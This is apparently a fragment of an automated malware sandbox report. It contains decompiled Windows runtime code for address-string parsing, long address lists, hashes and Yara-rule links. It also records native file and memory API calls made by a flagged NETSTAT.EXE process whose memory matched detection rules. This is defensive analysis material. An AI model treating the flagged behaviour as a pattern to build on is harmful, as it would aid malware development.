                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-3177188983
                                                                                                                                                  • Opcode ID: 40391dea3b3b0339b364a4a9ba0471a4a3641d1af9e355c4397c8c9c56922005
                                                                                                                                                  • Instruction ID: f32b32e5f25ce8c7ffeb2a9629a180b115012a23cb9099018fd5f759967a4e87
                                                                                                                                                  • Opcode Fuzzy Hash: 40391dea3b3b0339b364a4a9ba0471a4a3641d1af9e355c4397c8c9c56922005
                                                                                                                                                  • Instruction Fuzzy Hash: 3541F570600615BBDB20DB68DC95FAA7BB9BF85720F108A06FD59DB2C0D734E941CB68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0256FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0256FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0256EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0256EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0256685D(_t167, 4) == 0) {
								if(E0256685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0256685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0256685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02548980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0253DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0256EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0256EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                  0x0256fcd1
                                                                                                                                                  0x0256fcd6
                                                                                                                                                  0x0256fcd9
                                                                                                                                                  0x0256fcdc
                                                                                                                                                  0x0256fcdf
                                                                                                                                                  0x0256fce2
                                                                                                                                                  0x0256fce5
                                                                                                                                                  0x0256fce8
                                                                                                                                                  0x0256fceb
                                                                                                                                                  0x0256fced
                                                                                                                                                  0x0256fced
                                                                                                                                                  0x0256fcf3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fcfc
                                                                                                                                                  0x0256fcfe
                                                                                                                                                  0x0256fdc1
                                                                                                                                                  0x0259ecbd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eccc
                                                                                                                                                  0x0259eccc
                                                                                                                                                  0x0259ecd2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ecdf
                                                                                                                                                  0x0259ece0
                                                                                                                                                  0x0259ece4
                                                                                                                                                  0x0259eceb
                                                                                                                                                  0x0259ecee
                                                                                                                                                  0x0259eca8
                                                                                                                                                  0x0259eca8
                                                                                                                                                  0x0259ecaa
                                                                                                                                                  0x0256fd76
                                                                                                                                                  0x0256fd79
                                                                                                                                                  0x0256fdb4
                                                                                                                                                  0x0256fdb5
                                                                                                                                                  0x0256fdb6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fdb6
                                                                                                                                                  0x0256fd7e
                                                                                                                                                  0x0259ecfc
                                                                                                                                                  0x0256fe2f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fe2f
                                                                                                                                                  0x0259ed08
                                                                                                                                                  0x0259ed0f
                                                                                                                                                  0x0259ed17
                                                                                                                                                  0x0259ed1b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed1b
                                                                                                                                                  0x0256fd88
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fd94
                                                                                                                                                  0x0256fd99
                                                                                                                                                  0x0256fda1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fdb0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fdb0
                                                                                                                                                  0x0259ecbd
                                                                                                                                                  0x0256fdc7
                                                                                                                                                  0x0256fdcb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fdd7
                                                                                                                                                  0x0256fde3
                                                                                                                                                  0x0256fe06
                                                                                                                                                  0x02581fe7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02581fef
                                                                                                                                                  0x02581ff0
                                                                                                                                                  0x02581ff4
                                                                                                                                                  0x02581ff7
                                                                                                                                                  0x02581ffa
                                                                                                                                                  0x02581ffd
                                                                                                                                                  0x02582000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ecf1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ecf1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fe06
                                                                                                                                                  0x0256fde8
                                                                                                                                                  0x0256fdec
                                                                                                                                                  0x0256fdef
                                                                                                                                                  0x0256fdf2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fdf2
                                                                                                                                                  0x0256fdcb
                                                                                                                                                  0x0256fd04
                                                                                                                                                  0x0256fd05
                                                                                                                                                  0x0259ec67
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ec6f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ec6f
                                                                                                                                                  0x0256fd13
                                                                                                                                                  0x0256fd3c
                                                                                                                                                  0x0256fd40
                                                                                                                                                  0x0259ec75
                                                                                                                                                  0x0259ec7a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ec8a
                                                                                                                                                  0x0259ec8a
                                                                                                                                                  0x0259ec90
                                                                                                                                                  0x0259ecb2
                                                                                                                                                  0x0256fd73
                                                                                                                                                  0x0256fd73
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fd73
                                                                                                                                                  0x0259ec95
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eca1
                                                                                                                                                  0x0259eca4
                                                                                                                                                  0x0259eca5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eca5
                                                                                                                                                  0x0259ec7a
                                                                                                                                                  0x0256fd4a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fd6e
                                                                                                                                                  0x0256fd6e
                                                                                                                                                  0x0256fd71
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fd71
                                                                                                                                                  0x0256fd4a
                                                                                                                                                  0x0256fd21
                                                                                                                                                  0x0257a3a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0257a3a1
                                                                                                                                                  0x0256fd36
                                                                                                                                                  0x0258200b
                                                                                                                                                  0x02582012
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02582018
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02582018
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fd36
                                                                                                                                                  0x0256fe0f
                                                                                                                                                  0x0256fe16
                                                                                                                                                  0x0257a3ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0257a3b3
                                                                                                                                                  0x0257a3b3
                                                                                                                                                  0x0256fe1f
                                                                                                                                                  0x0259ed25
                                                                                                                                                  0x0259ed86
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed91
                                                                                                                                                  0x0259ed95
                                                                                                                                                  0x0259ed95
                                                                                                                                                  0x0259ed9a
                                                                                                                                                  0x0259edad
                                                                                                                                                  0x0259edb3
                                                                                                                                                  0x0259edba
                                                                                                                                                  0x0259edc4
                                                                                                                                                  0x0259edc9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259edcc
                                                                                                                                                  0x0259ed2a
                                                                                                                                                  0x0259ed55
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed61
                                                                                                                                                  0x0259ed66
                                                                                                                                                  0x0259ed6e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed7d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed7d
                                                                                                                                                  0x0259ed30
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed3c
                                                                                                                                                  0x0259ed43
                                                                                                                                                  0x0259ed4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fassign
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3965848254-0
                                                                                                                                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                  • Instruction ID: 880dc5f2727d8f4ca098a6ef1281a43632b57bd68fdcb8681bc9f1064ca207ad
                                                                                                                                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                  • Instruction Fuzzy Hash: 0391B171E0020AEFDF25CF98D8497BEBBB4FF45308F20846AD406A7551E7305A51CB99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Analysis Process: NETSTAT.EXE PID: 2832 Parent PID: 1388 NETSTAT.EXECOMMON

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00099D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: .z`$wK
                                                                                                                                                  • API String ID: 823142352-635088003
                                                                                                                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                  • Instruction ID: 0a441b4dce64d7bec0249cb88b86821ea0342ac4fd6d7c1531e9a6fcd94e2e80
                                                                                                                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                  • Instruction Fuzzy Hash: 60F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00099D4B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: .z`$wK
                                                                                                                                                  • API String ID: 823142352-635088003
                                                                                                                                                  • Opcode ID: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                                                                                                                                                  • Instruction ID: b4e28f81552dabf8d26079c265d62c16fd98c5fab384b920943907eb4ff142bf
                                                                                                                                                  • Opcode Fuzzy Hash: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                                                                                                                                                  • Instruction Fuzzy Hash: 1FF0B6B2204149ABCB08DF98DD85CDBB7ADBF8C354B05864CFA5D93201D630E8518BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00099DA4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: .z`$wK
                                                                                                                                                  • API String ID: 823142352-635088003
                                                                                                                                                  • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                  • Instruction ID: 72a27c67d75c62c2b748e7d4a7c187b675e4c59541f47ddf6178da0e82cfd5df
                                                                                                                                                  • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                  • Instruction Fuzzy Hash: BBF06CB2215109AF8B58DF9CD890DEB73F9BF8C354B159648FA4D93201D631E851CBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00099E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                  • Instruction ID: fead514cabe4814d174c9c8fb60ffadff092d031a689921e6f23a6cb00221d16
                                                                                                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                  • Instruction Fuzzy Hash: 10F0A4B2200208AFCB14DF89DC91EEB77ADAF8C754F158248BE1D97241D630E8118BA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00099DFE, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                                                                                                                                                  • Instruction ID: 15814952b34f15fadc7ea73fb5bf1213ce15886017840d43c7bd674ad2d8b0e3
                                                                                                                                                  • Opcode Fuzzy Hash: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                                                                                                                                                  • Instruction Fuzzy Hash: F7F0A4B6200108AFCB14DF89DC91EEB77A9AF8C354F168649BE1DA7251C630E8118BA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00099F2B, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                                                                                                                                                  • Instruction ID: 2dddf084dcba1ec77312e3149dd3078b319210c9a9e876e468a01dc41263e8ba
                                                                                                                                                  • Opcode Fuzzy Hash: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                                                                                                                                                  • Instruction Fuzzy Hash: 27F052B2210218AFCB18DF88DC91EEB77ADAF88310F158208FE1C97241C630E910CBE0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00099F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                  • Instruction ID: 49c918a45e5b2d10f2cbb8b42365379f4a3975464c59e5165204c3099a04dbe1
                                                                                                                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                  • Instruction Fuzzy Hash: 67F015B2200208AFCB14DF89CC81EEB77ADAF88750F118148BE1897241C630F810CBE0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00099E7A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                                                                                                                                                  • Instruction ID: ab6ea4d880ad19167aef1d36909cc263392c85e41cc02b06a8518bfe265f1311
                                                                                                                                                  • Opcode Fuzzy Hash: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                                                                                                                                                  • Instruction Fuzzy Hash: A5E08C35200104AFDB10EFA8CC8AEE7BB68EF48350F064199BA5C9B242C631A6508690
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00099E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                  • Instruction ID: 7bafa5a8a84721917e68a6eceee91e07c96d2fc345112c48b1fd92cb674e3066
                                                                                                                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                  • Instruction Fuzzy Hash: 38D01776600214ABDB10EB98CC86EE77BACEF49760F154499BA5C9B242C530FA0086E0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C500C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C507AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
